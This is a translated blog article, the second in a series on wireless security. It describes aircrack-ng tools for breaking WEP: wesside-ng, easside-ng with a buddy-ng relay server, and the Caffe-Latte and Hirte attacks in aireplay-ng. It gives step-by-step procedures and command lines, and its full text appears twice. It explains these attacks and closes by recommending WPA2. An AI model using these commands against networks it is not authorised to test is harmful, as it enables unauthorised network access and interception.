Attacks on wireless networks. Part 2
This is a continuation of the previous article about attacks on wireless access points with WEP protection .
In the second part of a series of articles on wireless security, we will look at some unconventional attacks on WEP.
In the latest (unstable) version of the aircrack-ng package, several programs have been added that implement new attacks on the WEP protocol.
')
The first one is wesside-ng . In essence, this is a script that automates key breaking. The program has several parameters, but to work you just need to pass on the name of the used network interface to it:
wesside-ng -i wlan0
The algorithm works the same as for manual hacking:
1. Jumping on the channels, a WEP network is detected.
2. Fake authentication is performed. If MAC filtering is enabled, the adapter address is changed to a valid one.
3. Authorization is made.
4. A 128-bit key stream is extracted by a fragmentation attack.
5. Having caught an ARP packet, the IP address in its body is decrypted. Based on this data, as well as the key stream, a fake ARP packet is created.
6. The network is filled with fake ARP packets.
7. Run ptw - attack to calculate the key.
The second new program is easside-ng . It allows you to connect to a wireless network with WEP without knowing the key itself.
[caption id = "attachment_294" align = "alignnone" width = "500" caption = "easside-ng operation scheme"]
[/ caption]
To implement this attack, you must be able to run the easside-ng component - buddy-ng on a server on the Internet. Also, the wireless network and the computer from which you are attacking should be able to communicate with buddy-ng. The scheme of work is quite simple:
1. A key stream of the maximum possible length (1504 bits) is extracted with a fragmentation attack.
2. Manipulations with ARP-packages we learn network addressing.
3. Connections to the server are established and its performance is checked.
Next, to transfer the packet to the network — it is converted using a key stream and sent.
Decrypting a received packet is a little more complicated - first, the information necessary for delivering the packet to the server is added to it, and it is sent back to the wireless network. The access point in turn decrypts the packet and forwards it to the Internet. The server, having received the packet, will send it to you, in open form.
This attack is very quiet and fast, because you do not need to send tens of thousands of packets, which distinguishes it favorably from the traditional attack on WEP.
The program starts very simple:
On the external server - buddy-ng
And on your computer - easside-ng -f <network interface> -v <MAC of the attacking point> -c <point channel> -s <external server address>
And the last innovation is the new options in the aireplay-ng program. 2 new parameters allow to carry out attacks on clients, extracting WEP - key, outside the range of the corresponding network.
aireplay-ng -6 -h <MAC network card> -D <network interface> , for the so-called "Caffe-Latte" attack, and
aireplay-ng -7 -h <MAC network card> -D <network interface>, for Hirte attack.
Both of them perform the same function, but in slightly different ways. First, an ARP is expected - a request from any client within the range of the network card. After that, a key stream of small length is extracted and an ARP request is created, to which the client will respond.
Next, airodump-ng runs, packages are collected, and the key is calculated using aircrack-ng .
Finally, it is worth noting that these new types of attacks only make it easier to hack Wi-Fi networks with WEP protection. And the only option for today is WPA2, PSK or Enterprise.
In the next article, we will examine in detail the possibilities of hacking WPA-protected networks, as well as a new attack on WPA-TKIP, and we will try to answer the question of whether WPA really cannot provide complete confidence in the security of your wireless network.
Author: Kozhara Yaroslav , Glaive Security Group
In the second part of a series of articles on wireless security, we will look at some unconventional attacks on WEP.
In the latest (unstable) version of the aircrack-ng package, several programs have been added that implement new attacks on the WEP protocol.
')
The first one is wesside-ng . In essence, this is a script that automates key breaking. The program has several parameters, but to work you just need to pass on the name of the used network interface to it:
wesside-ng -i wlan0
The algorithm works the same as for manual hacking:
1. Jumping on the channels, a WEP network is detected.
2. Fake authentication is performed. If MAC filtering is enabled, the adapter address is changed to a valid one.
3. Authorization is made.
4. A 128-bit key stream is extracted by a fragmentation attack.
5. Having caught an ARP packet, the IP address in its body is decrypted. Based on this data, as well as the key stream, a fake ARP packet is created.
6. The network is filled with fake ARP packets.
7. Run ptw - attack to calculate the key.
The second new program is easside-ng . It allows you to connect to a wireless network with WEP without knowing the key itself.
[caption id = "attachment_294" align = "alignnone" width = "500" caption = "easside-ng operation scheme"]
[/ caption]To implement this attack, you must be able to run the easside-ng component - buddy-ng on a server on the Internet. Also, the wireless network and the computer from which you are attacking should be able to communicate with buddy-ng. The scheme of work is quite simple:
1. A key stream of the maximum possible length (1504 bits) is extracted with a fragmentation attack.
2. Manipulations with ARP-packages we learn network addressing.
3. Connections to the server are established and its performance is checked.
Next, to transfer the packet to the network — it is converted using a key stream and sent.
Decrypting a received packet is a little more complicated - first, the information necessary for delivering the packet to the server is added to it, and it is sent back to the wireless network. The access point in turn decrypts the packet and forwards it to the Internet. The server, having received the packet, will send it to you, in open form.
This attack is very quiet and fast, because you do not need to send tens of thousands of packets, which distinguishes it favorably from the traditional attack on WEP.
The program starts very simple:
On the external server - buddy-ng
And on your computer - easside-ng -f <network interface> -v <MAC of the attacking point> -c <point channel> -s <external server address>
And the last innovation is the new options in the aireplay-ng program. 2 new parameters allow to carry out attacks on clients, extracting WEP - key, outside the range of the corresponding network.
aireplay-ng -6 -h <MAC network card> -D <network interface> , for the so-called "Caffe-Latte" attack, and
aireplay-ng -7 -h <MAC network card> -D <network interface>, for Hirte attack.
Both of them perform the same function, but in slightly different ways. First, an ARP is expected - a request from any client within the range of the network card. After that, a key stream of small length is extracted and an ARP request is created, to which the client will respond.
Next, airodump-ng runs, packages are collected, and the key is calculated using aircrack-ng .
Finally, it is worth noting that these new types of attacks only make it easier to hack Wi-Fi networks with WEP protection. And the only option for today is WPA2, PSK or Enterprise.
In the next article, we will examine in detail the possibilities of hacking WPA-protected networks, as well as a new attack on WPA-TKIP, and we will try to answer the question of whether WPA really cannot provide complete confidence in the security of your wireless network.
Author: Kozhara Yaroslav , Glaive Security Group
Source: https://habr.com/ru/post/50249/
All Articles